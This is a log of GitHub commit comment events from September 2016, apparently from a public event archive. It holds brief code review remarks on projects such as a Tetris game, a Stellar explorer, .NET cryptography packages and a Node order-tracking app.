{"id":"4569172827","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19039591,"position":33,"line":120,"path":"sdlAdventures/Game.cpp","commit_id":"941da352dddbb9637ca5105d4970b34cfad0c3b4","created_at":"2016-09-15T16:25:48Z","updated_at":"2016-09-15T16:25:48Z","body":"estos strings ponelos en variables"}},"created_at":"2016-09-15T16:25:48Z"}
{"id":"4569173053","type":"CommitCommentEvent","actor":{"login":"bartekn"},"repo":{"name":"TGoC/StellarChain.io"},"payload":{"comment":{"id":19039595,"position":18,"line":209,"path":"assets/js/application.js","commit_id":"024fba9362b359b3c336ef6d3432cef67b28b809","created_at":"2016-09-15T16:25:51Z","updated_at":"2016-09-15T16:25:51Z","body":"It's incorrect. Every operation can have a `source` different than transaction. So it should rather be (in pseudocode because I don't know how your structures look like):\r\n```js\r\nif (operation.source != null) {\r\n   from = operation.source;\r\n} else {\r\n   from = transaction.source;\r\n}\r\n```\r\nMore info in our [docs](https://www.stellar.org/developers/guides/concepts/operations.html#transactions-involving-multiple-accounts)."}},"created_at":"2016-09-15T16:25:51Z"}
{"id":"4569174108","type":"CommitCommentEvent","actor":{"login":"036"},"repo":{"name":"mybb/mybb"},"payload":{"comment":{"id":19039610,"position":null,"line":null,"path":null,"commit_id":"141bd8565e922470132cff87d3885c815a158937","created_at":"2016-09-15T16:26:01Z","updated_at":"2016-09-15T16:26:01Z","body":"+1 \r\n"}},"created_at":"2016-09-15T16:26:01Z"}
{"id":"4569175088","type":"CommitCommentEvent","actor":{"login":"chrislovecnm"},"repo":{"name":"DualSpark/kops"},"payload":{"comment":{"id":19039619,"position":4,"line":16,"path":"Makefile","commit_id":"4c31034d839ea6072b13ff68f1747d20fc81371b","created_at":"2016-09-15T16:26:13Z","updated_at":"2016-09-15T16:26:13Z","body":"How would you recommend folding this into a bigger testing target?"}},"created_at":"2016-09-15T16:26:13Z"}
{"id":"4569177569","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039625,"position":52,"line":52,"path":"tests/server/models/order-test.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:26:36Z","updated_at":"2016-09-15T16:26:36Z","body":"Glad to see multiple tests! Have you set up CI?"}},"created_at":"2016-09-15T16:26:36Z"}
{"id":"4569185221","type":"CommitCommentEvent","actor":{"login":"samth"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19039667,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T16:27:58Z","updated_at":"2016-09-15T16:27:58Z","body":"In fact, looking at the dependencies, `racket-doc` already transitively depends on `web-server-doc`."}},"created_at":"2016-09-15T16:27:58Z"}
{"id":"4569186071","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas"},"payload":{"comment":{"id":19039673,"position":null,"line":null,"path":null,"commit_id":"9f7415cdbd119cfcad4216b11c52fb59a6cfd7d1","created_at":"2016-09-15T16:28:08Z","updated_at":"2016-09-15T16:28:08Z","body":"@jcredding FYI.  This started back in #185 (https://github.com/redding/deas/pull/185/files#diff-b1eb00e3d693e9eb4d0cf15364153129R15) and I exacerbated the confusion here #223 (https://github.com/redding/deas/commit/2d6260e68841723f94fc49fa0cc41051f7eeb17d#diff-b1eb00e3d693e9eb4d0cf15364153129R15).  Just cleaning up my mess.  I noticed this while adding fetch to the sinatra/qs error contexts."}},"created_at":"2016-09-15T16:28:08Z"}
{"id":"4569186488","type":"CommitCommentEvent","actor":{"login":"junmocsq"},"repo":{"name":"junmocsq/gyy_c"},"payload":{"comment":{"id":19039677,"position":6,"line":null,"path":"ctest/assert01.c","commit_id":"99ff707901a687bf1354537dca02febf8e85b89c","created_at":"2016-09-15T16:28:12Z","updated_at":"2016-09-15T16:28:12Z","body":"在一起时"}},"created_at":"2016-09-15T16:28:12Z"}
{"id":"4569188673","type":"CommitCommentEvent","actor":{"login":"michalwski"},"repo":{"name":"esl/MongooseIM"},"payload":{"comment":{"id":19039684,"position":5,"line":166,"path":"apps/ejabberd/src/mongoose_api_metrics.erl","commit_id":"98c0fcdbc9e210f50403e5f415dc5cac88746b92","created_at":"2016-09-15T16:28:34Z","updated_at":"2016-09-15T16:28:34Z","body":"Where this function is used?"}},"created_at":"2016-09-15T16:28:34Z"}
{"id":"4569197036","type":"CommitCommentEvent","actor":{"login":"ahmedtds"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":19039705,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-15T16:30:03Z","updated_at":"2016-09-15T16:30:03Z","body":"He seems active in github. Recent activity shows he contributed to a project just 3 days ago. But he never replied about this. We just want our lists back that's all. Please at least just for a few days give us an opportunity to save our lists."}},"created_at":"2016-09-15T16:30:03Z"}
{"id":"4569199708","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"premaca/android_device_wingtech_wt88047"},"payload":{"comment":{"id":19039732,"position":null,"line":null,"path":null,"commit_id":"da1392d2052e04e54915ca992dd9cff45ed591e5","created_at":"2016-09-15T16:30:33Z","updated_at":"2016-09-15T16:30:33Z","body":"Sir your Build Cooked With this tree boots ?"}},"created_at":"2016-09-15T16:30:33Z"}
{"id":"4569201093","type":"CommitCommentEvent","actor":{"login":"Ngawinganjukwidarto"},"repo":{"name":"git/git"},"payload":{"comment":{"id":19039735,"position":8,"line":450,"path":"Documentation/config.txt","commit_id":"3c8ede3ff312134e84d1b23a309cd7d2a7c98e9c","created_at":"2016-09-15T16:30:45Z","updated_at":"2016-09-15T16:30:45Z","body":"git/Documentation/gitcvs-migration.txt"}},"created_at":"2016-09-15T16:30:45Z"}
{"id":"4569203209","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19039738,"position":16,"line":17,"path":"src/System.Security.Cryptography.Algorithms/src/System.Security.Cryptography.Algorithms.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T16:31:10Z","updated_at":"2016-09-15T16:31:10Z","body":"mmm I don't see TargetGroup getting set, what got set is NuGetTargetMoniker which is different. TargetGroup gets set on the .builds file and if you check looks like your netstandard1.7 builds don't have a TargetGroup set since it is the default."}},"created_at":"2016-09-15T16:31:10Z"}
{"id":"4569206655","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19039745,"position":10,"line":18,"path":"src/System.Security.Cryptography.Cng/src/System.Security.Cryptography.Cng.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T16:31:47Z","updated_at":"2016-09-15T16:31:47Z","body":"oh right, sorry I didn't see that."}},"created_at":"2016-09-15T16:31:47Z"}
{"id":"4569207091","type":"CommitCommentEvent","actor":{"login":"Ngawinganjukwidarto"},"repo":{"name":"git/git"},"payload":{"comment":{"id":19039746,"position":null,"line":null,"path":null,"commit_id":"3c8ede3ff312134e84d1b23a309cd7d2a7c98e9c","created_at":"2016-09-15T16:31:49Z","updated_at":"2016-09-15T16:31:49Z","body":"3c8ede3"}},"created_at":"2016-09-15T16:31:49Z"}
{"id":"4569207586","type":"CommitCommentEvent","actor":{"login":"ptonner"},"repo":{"name":"ptonner/gpfanova"},"payload":{"comment":{"id":19039748,"position":null,"line":null,"path":null,"commit_id":"98613bea7d8e763c1faf53abe8d208bd18caafdd","created_at":"2016-09-15T16:31:56Z","updated_at":"2016-09-15T16:31:56Z","body":"accomplished with `git checkout -f f55306aadd495255a3e7fc1f1a36fca7a9166f7f -- .`"}},"created_at":"2016-09-15T16:31:56Z"}
{"id":"4569210461","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19039755,"position":null,"line":null,"path":null,"commit_id":"ca2e4c00205a353cd6e6e5245e51b8dc1c0cfa91","created_at":"2016-09-15T16:32:26Z","updated_at":"2016-09-15T16:32:26Z","body":"@buddhi1980 what do you think about the location?"}},"created_at":"2016-09-15T16:32:26Z"}
{"id":"4569210593","type":"CommitCommentEvent","actor":{"login":"Ngawinganjukwidarto"},"repo":{"name":"git/git"},"payload":{"comment":{"id":19039756,"position":24,"line":761,"path":"connect.c","commit_id":"3c8ede3ff312134e84d1b23a309cd7d2a7c98e9c","created_at":"2016-09-15T16:32:27Z","updated_at":"2016-09-15T16:32:27Z","body":"git/Documentation/gitcvs-migration.txt"}},"created_at":"2016-09-15T16:32:27Z"}
{"id":"4569213295","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19039765,"position":45,"line":45,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T16:32:58Z","updated_at":"2016-09-15T16:32:58Z","body":"I don't know for a client 32000 servers seems to be a lot :)\r\n(maybe this a premature optimization)"}},"created_at":"2016-09-15T16:32:58Z"}
{"id":"4569213777","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19039768,"position":46,"line":133,"path":"sdlAdventures/Game.cpp","commit_id":"941da352dddbb9637ca5105d4970b34cfad0c3b4","created_at":"2016-09-15T16:33:04Z","updated_at":"2016-09-15T16:33:04Z","body":"Me gusta esto de tener inicializadores y disposeadores. Sin embargo, yo agregaría una variable de estado privada booleana que se ponga en true cuando esté inicializado. Y si al llamar al destructor sigue inicializada, entonces llamaría al disposeador."}},"created_at":"2016-09-15T16:33:04Z"}
{"id":"4569213824","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19039769,"position":4,"line":6,"path":"src/System.Security.Cryptography.Primitives/pkg/System.Security.Cryptography.Primitives.pkgproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T16:33:04Z","updated_at":"2016-09-15T16:33:04Z","body":"I see, if that is coming on same PR then it's fine, if not then I would suggest to keep these changes with the assembly version change and reference assembly change together"}},"created_at":"2016-09-15T16:33:04Z"}
{"id":"4569215270","type":"CommitCommentEvent","actor":{"login":"pabloguerrero"},"repo":{"name":"hackmdio/hackmd"},"payload":{"comment":{"id":19039774,"position":9,"line":10,"path":"locales/es.json","commit_id":"bf5817a56246bb77053360da7669953eda14e38a","created_at":"2016-09-15T16:33:20Z","updated_at":"2016-09-15T16:33:20Z","body":"@svg153 evidently a much more reasonable translation 👍 "}},"created_at":"2016-09-15T16:33:20Z"}
{"id":"4569217260","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039779,"position":63,"line":63,"path":"server/app/routes/orders/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:33:42Z","updated_at":"2016-09-15T16:33:42Z","body":"```js\r\ncatch (function (err) {\r\nerr = err || Error ('ooops')\r\nerr.status = 404\r\nnext (err)\r\n})\r\n```"}},"created_at":"2016-09-15T16:33:42Z"}
{"id":"4569217912","type":"CommitCommentEvent","actor":{"login":"NateAnderson1780"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19039780,"position":null,"line":null,"path":null,"commit_id":"63bd73e020ef61e87ff2854ab55371e491406871","created_at":"2016-09-15T16:33:49Z","updated_at":"2016-09-15T16:33:49Z","body":"@calaway I believe it is session.clear and then we will redirect_to root_path"}},"created_at":"2016-09-15T16:33:49Z"}
{"id":"4569220391","type":"CommitCommentEvent","actor":{"login":"Scorpion96"},"repo":{"name":"Scorpion96/scorpion96.github.io"},"payload":{"comment":{"id":19039785,"position":null,"line":null,"path":null,"commit_id":"796990c05b9d35afe530efaaf8f26171ee2c187d","created_at":"2016-09-15T16:34:19Z","updated_at":"2016-09-15T16:34:19Z","body":"Done"}},"created_at":"2016-09-15T16:34:19Z"}
{"id":"4569220831","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19039786,"position":16,"line":32,"path":"sdlAdventures/Game.h","commit_id":"941da352dddbb9637ca5105d4970b34cfad0c3b4","created_at":"2016-09-15T16:34:23Z","updated_at":"2016-09-15T16:34:23Z","body":"El cuerpo de esta función ponelo en el cpp."}},"created_at":"2016-09-15T16:34:23Z"}
{"id":"4569221204","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":19039787,"position":45,"line":105,"path":"scripts/album.js","commit_id":"88514e6374073185a74de04c3c60502ebddd76ea","created_at":"2016-09-15T16:34:27Z","updated_at":"2016-09-15T16:34:27Z","body":"I'm not sure why it doesn't work when I pass songDirection to .hasClass() instead of 'next' and 'previous'. How would you troubleshoot this?"}},"created_at":"2016-09-15T16:34:27Z"}
{"id":"4569221886","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19039790,"position":null,"line":null,"path":null,"commit_id":"5e4bfc0a0218e6529e47a50914c203f40b04493d","created_at":"2016-09-15T16:34:34Z","updated_at":"2016-09-15T16:34:34Z","body":"Nevermind, i don't care. Find it yourself."}},"created_at":"2016-09-15T16:34:34Z"}
{"id":"4569222932","type":"CommitCommentEvent","actor":{"login":"aramosdev"},"repo":{"name":"baconside/portfolio"},"payload":{"comment":{"id":19039793,"position":2178,"line":2178,"path":"css/font-awesome.css","commit_id":"bfbca9c3804a899541f470af38cba9f61555996a","created_at":"2016-09-15T16:34:44Z","updated_at":"2016-09-15T16:34:44Z","body":"Mano, vc vai usar todas esses ícones ?"}},"created_at":"2016-09-15T16:34:44Z"}
{"id":"4569223178","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039794,"position":52,"line":52,"path":"tests/server/models/order-test.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:34:46Z","updated_at":"2016-09-15T16:34:46Z","body":"I can see that you haven't, and one of your tests is failing. ;-)"}},"created_at":"2016-09-15T16:34:46Z"}
{"id":"4569225092","type":"CommitCommentEvent","actor":{"login":"peepsnet"},"repo":{"name":"cyoung/stratux"},"payload":{"comment":{"id":19039798,"position":null,"line":null,"path":null,"commit_id":"4659e03dbd1629675d16a8afa377f4ad8d62aeab","created_at":"2016-09-15T16:35:04Z","updated_at":"2016-09-15T16:35:04Z","body":"https://github.com/cyoung/stratux/blob/4659e03dbd1629675d16a8afa377f4ad8d62aeab/image/fancontrol.py#L6\r\n\r\nline 6,,, should it say 12 now"}},"created_at":"2016-09-15T16:35:04Z"}
{"id":"4569227170","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039802,"position":52,"line":52,"path":"tests/server/models/order-test.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:35:23Z","updated_at":"2016-09-15T16:35:23Z","body":"Also — you have 33 linter warnings! I'd get everyone on ESLint in their editor, which is easier than watching the gulp process warnings."}},"created_at":"2016-09-15T16:35:23Z"}
{"id":"4569227263","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19039803,"position":null,"line":null,"path":null,"commit_id":"9cd6a8c1ae2ad2af5ec56e0dbf6852f3ebf9e005","created_at":"2016-09-15T16:35:23Z","updated_at":"2016-09-15T16:35:23Z","body":"From the global field?\r\nYou mean the \"Unknown\"?\r\nNah better safe than sorry. Moreover the engine requires a defaul_value for each setting in fdmprinter"}},"created_at":"2016-09-15T16:35:23Z"}
{"id":"4569227341","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19039804,"position":null,"line":null,"path":null,"commit_id":"941da352dddbb9637ca5105d4970b34cfad0c3b4","created_at":"2016-09-15T16:35:24Z","updated_at":"2016-09-15T16:35:24Z","body":"Excelente!!! Me gusta mucho como está quedando esto!!! No veo la hora de poder jugarlo!!! :)"}},"created_at":"2016-09-15T16:35:24Z"}
{"id":"4569228552","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039808,"position":72,"line":72,"path":"server/app/routes/orders/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:35:34Z","updated_at":"2016-09-15T16:35:34Z","body":"if you want to mnually handle the error you could do this \r\n```js\r\ncatch (function (err) {\r\n  err = err || Error ('ooops');\r\n  err.status = 404;\r\n  next (err);\r\n})\r\n```"}},"created_at":"2016-09-15T16:35:34Z"}
{"id":"4569230372","type":"CommitCommentEvent","actor":{"login":"stephanierogers"},"repo":{"name":"stephanierogers/bookish-octo-succotash"},"payload":{"comment":{"id":19039817,"position":null,"line":null,"path":null,"commit_id":"c169b53495260dad54113e78d0bdadc51dbb3dd5","created_at":"2016-09-15T16:35:50Z","updated_at":"2016-09-15T16:35:50Z","body":"I have no idea what I'm doing!!"}},"created_at":"2016-09-15T16:35:50Z"}
{"id":"4569231240","type":"CommitCommentEvent","actor":{"login":"venkatkarun"},"repo":{"name":"davireis/jquery.dfp.js"},"payload":{"comment":{"id":19039821,"position":4,"line":547,"path":"jquery.dfp.js","commit_id":"450731e6f4a0d12cf53302a4b658ee4f30f4f9f5","created_at":"2016-09-15T16:35:58Z","updated_at":"2016-09-15T16:35:58Z","body":"Simpler to just use document.getElementsByTagName('head')[0].appendChild(gads); IMO. The if-else seems unnecessary. "}},"created_at":"2016-09-15T16:35:58Z"}
{"id":"4569231964","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19039823,"position":null,"line":null,"path":null,"commit_id":"4c9eaa6b1a60cfaf2607127661b59cb9058af229","created_at":"2016-09-15T16:36:05Z","updated_at":"2016-09-15T16:36:05Z","body":"Possibly silly Idea: higher bonus for double levers on our ranks 2-3 and lower bonus for those on ranks 5-6, as the latter usually give our opponent more chances to preserve the pawn structure (I mean e.g. `Lever` values like yours or slightly higher for ranks 2-3 and lower values than yours for ranks 5-6).\r\nI don't know how often double levers on ranks 5-6 arise, though..."}},"created_at":"2016-09-15T16:36:05Z"}
{"id":"4569236408","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039838,"position":63,"line":63,"path":"server/app/routes/orders/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:36:53Z","updated_at":"2016-09-15T16:36:53Z","body":"I would pass next into the function "}},"created_at":"2016-09-15T16:36:53Z"}
{"id":"4569238283","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19039842,"position":null,"line":null,"path":null,"commit_id":"53f48d4519df5fc709cbd6b28097af2d57ebef37","created_at":"2016-09-15T16:37:14Z","updated_at":"2016-09-15T16:37:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YRqJ4ogYSBixlGOyg0DAWw"}},"created_at":"2016-09-15T16:37:14Z"}
{"id":"4569241069","type":"CommitCommentEvent","actor":{"login":"laddawan013"},"repo":{"name":"laddawan013/nOoMay"},"payload":{"comment":{"id":19039846,"position":null,"line":null,"path":null,"commit_id":"7d6cbd697ab7e244c26bf49222f34865866bfc96","created_at":"2016-09-15T16:37:47Z","updated_at":"2016-09-15T16:37:47Z","body":"finish README.md"}},"created_at":"2016-09-15T16:37:47Z"}
{"id":"4569242560","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039853,"position":48,"line":48,"path":"tests/server/routes/orders-test.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:38:06Z","updated_at":"2016-09-15T16:38:06Z","body":"Don't `catch` and `return` this promise chain AND mix in `done` — Mocha 3 actually calls this \"over-specifying\" the promise. The following, with no `done` functions, is sufficient:\r\n\r\n```js\r\nreturn Order.create(orderInfo1)\r\n      .then(function (order) {\r\n        order1 = order;\r\n        return Order.create(orderInfo2)\r\n      })\r\n      .then(function (order) {\r\n        order2 = order;\r\n      });\r\n```"}},"created_at":"2016-09-15T16:38:06Z"}
{"id":"4569245563","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19039858,"position":null,"line":null,"path":null,"commit_id":"7bae002dd0f178b37e1e8d73f77eafca0b3e79bd","created_at":"2016-09-15T16:38:39Z","updated_at":"2016-09-15T16:38:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GX3xuGP0RHS6Ftlkkyhg-Q"}},"created_at":"2016-09-15T16:38:39Z"}
{"id":"4569245884","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039862,"position":88,"line":88,"path":"server/app/routes/orders/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:38:43Z","updated_at":"2016-09-15T16:38:43Z","body":"I really like that you add the comments for routes "}},"created_at":"2016-09-15T16:38:43Z"}
{"id":"4569249314","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039876,"position":133,"line":133,"path":"gulpfile.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:39:24Z","updated_at":"2016-09-15T16:39:24Z","body":"I like that you're adding Gulp tasks. :-)"}},"created_at":"2016-09-15T16:39:24Z"}
{"id":"4569250780","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039881,"position":4,"line":4,"path":"secret_example.json","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:39:40Z","updated_at":"2016-09-15T16:39:40Z","body":"Why?"}},"created_at":"2016-09-15T16:39:40Z"}
{"id":"4569253232","type":"CommitCommentEvent","actor":{"login":"jung35"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":19039886,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-15T16:40:11Z","updated_at":"2016-09-15T16:40:11Z","body":"I have no intentions of coding something up to allow people to grab their\nlist.\n\nOn Sep 15, 2016 11:30 AM, \"ahmedtds\" <notifications@github.com> wrote:\n\n> He seems active in github. Recent activity shows he contributed to a\n> project just 3 days ago. But he never replied about this. We just want our\n> lists back that's all. Please at least just for a few days give us an\n> opportunity to save our lists.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jung35/VacStatus/commit/220c3a372d33b1649d6c3129910b6c1ec4ed5c89#commitcomment-19039705>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AApJDt3tIAbbr2EMSvHarotGqTCziu1Yks5qqXKLgaJpZM4JrFAC>\n> .\n>\n"}},"created_at":"2016-09-15T16:40:11Z"}
{"id":"4569256509","type":"CommitCommentEvent","actor":{"login":"TGoC"},"repo":{"name":"TGoC/StellarChain.io"},"payload":{"comment":{"id":19039895,"position":18,"line":209,"path":"assets/js/application.js","commit_id":"024fba9362b359b3c336ef6d3432cef67b28b809","created_at":"2016-09-15T16:40:46Z","updated_at":"2016-09-15T16:40:46Z","body":"i've done the change accordingly. the current version only works with 1 operation per tx i'm planing to rewrite the whole thing to make support for all, as current version is only a prototype to get familiar with the sdk"}},"created_at":"2016-09-15T16:40:46Z"}
{"id":"4569259887","type":"CommitCommentEvent","actor":{"login":"Ngawinganjukwidarto"},"repo":{"name":"git/git"},"payload":{"comment":{"id":19039902,"position":null,"line":null,"path":null,"commit_id":"813c47b504e1890a26a437b0981ea83d2c011b77","created_at":"2016-09-15T16:41:22Z","updated_at":"2016-09-15T16:41:22Z","body":"On 813c47b"}},"created_at":"2016-09-15T16:41:22Z"}
{"id":"4569260382","type":"CommitCommentEvent","actor":{"login":"h0tbird"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19039903,"position":null,"line":null,"path":null,"commit_id":"0cf59707bd46b13c1d49d509e50da6519f1126fa","created_at":"2016-09-15T16:41:28Z","updated_at":"2016-09-15T16:41:28Z","body":"This breaks building kubernetes inside Alpine Linux:\r\n\r\n```\r\ngrep: unrecognized option: color=never\r\nBusyBox v1.24.2 (2016-06-23 08:49:16 GMT) multi-call binary.\r\n\r\nUsage: grep [-HhnlLoqvsriwFE] [-m N] [-A/B/C N] PATTERN/-e PATTERN.../-f FILE [FILE]...\r\n```"}},"created_at":"2016-09-15T16:41:28Z"}
{"id":"4569262717","type":"CommitCommentEvent","actor":{"login":"mksarge"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19039911,"position":null,"line":null,"path":null,"commit_id":"9b65edc52a7a5c33506c56ff9df56d249df7da51","created_at":"2016-09-15T16:41:55Z","updated_at":"2016-09-15T16:41:55Z","body":"this commit should fix the grades loading issue in #4 "}},"created_at":"2016-09-15T16:41:55Z"}
{"id":"4569263370","type":"CommitCommentEvent","actor":{"login":"jm-janzen"},"repo":{"name":"jm-janzen/doomguy"},"payload":{"comment":{"id":19039916,"position":1,"line":7,"path":"res/rows.json","commit_id":"6d4b2778d6f04f2fda1a1540e003b71707c5eb44","created_at":"2016-09-15T16:42:03Z","updated_at":"2016-09-15T16:42:03Z","body":"Check this column's values again.  Doesn't look quite right in output."}},"created_at":"2016-09-15T16:42:03Z"}
{"id":"4569264709","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039920,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:42:19Z","updated_at":"2016-09-15T16:42:19Z","body":"`internals` will do that, but you get the same `internals` each time you use mail-licker.\r\n\r\nWhat you want is multiple instances of mail-licker, which is how it was originally setup using `this` as a shared context per instance."}},"created_at":"2016-09-15T16:42:19Z"}
{"id":"4569266682","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19039925,"position":null,"line":null,"path":null,"commit_id":"2e8e92f2627915e275c40c3b870e49ff13491c52","created_at":"2016-09-15T16:42:42Z","updated_at":"2016-09-15T16:42:42Z","body":"Yes Boot Manager is the place.. it will be there.\n"}},"created_at":"2016-09-15T16:42:42Z"}
{"id":"4569266808","type":"CommitCommentEvent","actor":{"login":"alonsogarciapablo"},"repo":{"name":"CartoDB/cartodb.js"},"payload":{"comment":{"id":19039926,"position":null,"line":null,"path":null,"commit_id":"0f9b43e19aca650a917c31f70bcb0c2e0e3f98f3","created_at":"2016-09-15T16:42:44Z","updated_at":"2016-09-15T16:42:44Z","body":"cc: @xavijam @piensaenpixel "}},"created_at":"2016-09-15T16:42:44Z"}
{"id":"4569269735","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19039931,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T16:43:17Z","updated_at":"2016-09-15T16:43:17Z","body":"Yes, that is what I thought, it needs to check the count of `SPRITE_LIST_NULL` for all cases."}},"created_at":"2016-09-15T16:43:17Z"}
{"id":"4569270200","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039933,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:43:22Z","updated_at":"2016-09-15T16:43:22Z","body":"If all the functions (constructor and methods) are changed to use arrow-syntax, then `this` wont work."}},"created_at":"2016-09-15T16:43:22Z"}
{"id":"4569270431","type":"CommitCommentEvent","actor":{"login":"jm-janzen"},"repo":{"name":"jm-janzen/doomguy"},"payload":{"comment":{"id":19039935,"position":14,"line":16,"path":"res/rows.json","commit_id":"6d4b2778d6f04f2fda1a1540e003b71707c5eb44","created_at":"2016-09-15T16:43:25Z","updated_at":"2016-09-15T16:43:25Z","body":"Check this column's values again. Doesn't look quite right in output."}},"created_at":"2016-09-15T16:43:25Z"}
{"id":"4569271928","type":"CommitCommentEvent","actor":{"login":"ikkez"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19039942,"position":49,"line":1941,"path":"base.php","commit_id":"55bd6400e29cfc04783cfb929cd67f0fc31e9752","created_at":"2016-09-15T16:43:42Z","updated_at":"2016-09-15T16:43:42Z","body":"Is this correct here? Shouldn't it be\r\n```php\r\nif (!$error=error_get_last() && session_status()==PHP_SESSION_ACTIVE)\r\n    session_commit();\r\n```\r\n?"}},"created_at":"2016-09-15T16:43:42Z"}
